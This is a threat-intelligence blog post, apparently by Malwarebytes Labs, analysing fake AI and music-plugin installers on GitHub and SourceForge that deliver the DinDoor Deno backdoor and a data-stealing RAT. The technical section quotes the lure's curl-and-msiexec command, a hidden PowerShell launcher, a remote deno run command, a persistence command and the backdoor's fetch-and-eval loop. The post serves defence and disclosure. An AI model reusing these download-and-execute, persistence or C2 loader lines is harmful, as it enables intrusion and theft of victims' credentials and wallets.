# Fake software on GitHub and SourceForge distribute Deno RAT

Malwarebytes Labs, Threat Intel, published 2026-05-26. Source: https://www.malwarebytes.com/blog/threat-intel/2026/05/fake-software-on-github-and-sourceforge-distribute-deno-rat

During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as **DinDoor**. Attackers are using compromised YouTube channels to distribute links to these platforms.

DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.

Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.

These campaigns use **Scoop** (an alternative installer for Windows) and **WinGet** (the official Windows package manager) to install Deno on the victim's machine. They then use the Deno runtime to execute a RAT capable of running additional payloads and exfiltrating data from browsers, wallets, and other applications. The RAT also has an interesting peer-to-peer feature that uses Edge to hide malicious traffic.

## Legitimate platforms abused to spread malware

In most of the analyzed cases, the infection chain starts with **MSI files** or **PowerShell scripts** downloaded from GitHub or SourceForge. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views.

![](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_befa3c.png) ![Compromised YouTube channels with AI-generated videos](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_85cbc2.png)_Compromised YouTube channels with AI-generated videos_

The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware.

![YouTube posts linking to the malicious GitHub repositories](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_6f0e91.png)_YouTube posts linking to the malicious GitHub repositories_

The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We've observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, and Kontakt.

![GitHub repository for fake ChatGPT installer](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_4f1505.png)_GitHub repository for fake ChatGPT installer_

The malicious repositories provide a command for both Windows and macOS. They ask users to open a terminal and paste the command, which downloads and executes the MSI from GitHub.

![Fake plugin that asks the user to copy and execute the malicious command](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_8b2584.png)_Fake plugin that asks the user to copy and execute the malicious command_

Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users.

![GitHub account with different malicious repositories](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_f92f85.png)_GitHub account with different malicious repositories_

We found that the same backdoor was distributed through SourceForge, mimicking legitimate gaming software called GearUP and an AI watermark remover called BWR.

![](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_e5b648.png) ![](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_a7cb21.png)_The malicious MSI files hosted on SourceForge_

## How to stay safe

The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.

Here are a few simple ways to stay safe:

  * Only download software from official vendor websites.
  * Be skeptical of "free", cracked, or unofficial versions of paid software.
  * Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts.
  * Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher's profile, its reputation, and how recently it was created before downloading anything.
  * Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.
  * Check the file's publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file and selecting **Properties** > **Digital Signatures**. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag.

## Technical analysis

The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The command downloads an MSI from GitHub and installs it via `msiexec`. These repositories sometimes also contain PowerShell scripts that initiate the infection chain in a similar way.

Example of a malicious command hosted on GitHub that starts the infection chain:

    curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi

The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI `InstallationFolder` and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.

![The "Ps1File" and "CmdFile" inside the MSI dropper](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_2bac02.png)_The "Ps1File" and "CmdFile" inside the MSI dropper_

The CMD file executes the PowerShell script, whose name changes between the analyzed infection chains:

    @set "SCRIPTDIR=%~dp0"
    @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden"

![The executed PowerShell script](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_7027cd.png)_The executed PowerShell script_

The PowerShell script takes care of:

  * Ensuring the package manager Scoop is installed, and installing it if missing with the official script from `get.scoop.sh`. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows.
  * Using Scoop to install WinGet (Windows Package Manager) if missing.
  * Installing Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if it is not present.

Using the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility.

Command executed to install Deno using WinGet:

    "C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent

### The DinDoor Backdoor

Next, the following stage is executed with the downloaded Deno executable:

    "C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

The returned code (internally named "launcher-1") is a small eval loop that downloads the next stage (internally named "launcher-2"). The downloaded backdoor is publicly known as **DinDoor**.

    var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

The loop cycles through a comma-separated list of C2 hosts, requests `/{BUILD_ID}.js` from each, moves to the next host after a 5-second delay when a request fails, wraps any response in an async function and evaluates it, and then sleeps 30 seconds before repeating.

The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2. The HTTP endpoints used for C2 communications vary between the analyzed cases.

The backdoor obtains an ID from an HTTP endpoint (for example, `/security-pool`) and then uses that ID to obtain the next stage from `/v2{ID}.js`.

The obtained stage is executed via `stdin` without being written to disk, using the command:

    deno run -A --no-check -

To achieve persistence, the backdoor runs a PowerShell command to create a Run registry key that executes the downloader "launcher-1" used previously:

    conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime.

### Deno RAT

The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.

We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as "Smokest" based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team.

In addition to HTTP for C2 communication, the RAT also supports **WebSocket** communication, enabled when the JSON value `isLiveEnabled` returned from the C2 is set to true.

![The main function of the Deno RAT](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_ae43ad.png)_The main function of the Deno RAT_

The RAT supports different commands (`exec`, `exec-ps`, `exec-sc`, `sysinfo`, `screenshot`, `stealer`) and functionality:

  * Collect system information about the compromised device
  * Full bidirectional control through a custom VNC implementation over WebSocket
  * Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
  * Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo
  * Exfiltrate Telegram, Discord, and Lightcord data
  * Record and modify clipboard data
  * List folders and files, and exfiltrate content from files with specific extensions
  * Capture screenshots using different methods
  * Execute additional payloads
  * Launch or terminate arbitrary processes
  * Execute commands with PowerShell
  * Establish SOCKS5 proxy tunnels over WebSocket

One of the most interesting parts of the RAT is a **peer-to-peer streaming mode** that uses the Edge browser to hide traffic and make detection more difficult.

To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via the Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim's screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator's browser over an encrypted WebRTC DataChannel. The SDP and ICE signaling needed to establish the direct connection is exchanged through the existing C2 WebSocket.

![The injected HTML page inside Edge browser](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_1952d7.png)_The injected HTML page inside Edge browser_

The RAT uses the following endpoints for C2 communication, which can vary between samples:

  * `/health`: checks for the "ok" response from the C2
  * `/token`: receives config parameters, task delivery, results, and exfiltrated data
  * `/vnc/agent/`: WebSocket path used for VNC communication

The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data:

    {
      "buildId": "cd361ef3159f5ce9",
      "buildNote": "BWR",
      "buildType": "msi-v2",
      "proxyUrls": ["{C2}"],
      "userId": "…",
      "accessTokenHash": "…",
      "iat": 1779372546,
      "exp": 2094948546
    }

We found different versions of this RAT, including a "light" version called "agent-lite" that supports only a few commands and uses Cloudflare Workers for C2 communication.

![The "light" version of the RAT](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/05/image_e0a388.png)_The "light" version of the RAT_

## Acknowledgements

  * DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis
  * Smokest: https://x.com/vxunderground/status/2013006601133687004

## Indicators of Compromise (IOCs)

**URLs**

  * `https[:]//github.com/claude-free-plugin/`
  * `https[:]//github.com/ai-gen-profi`
  * `https[:]//github.com/wharfdemolisherpit`
  * `https[:]//sourceforge.net/projects/gearup/`
  * `https[:]//sourceforge.net/projects/bluewaveremover/`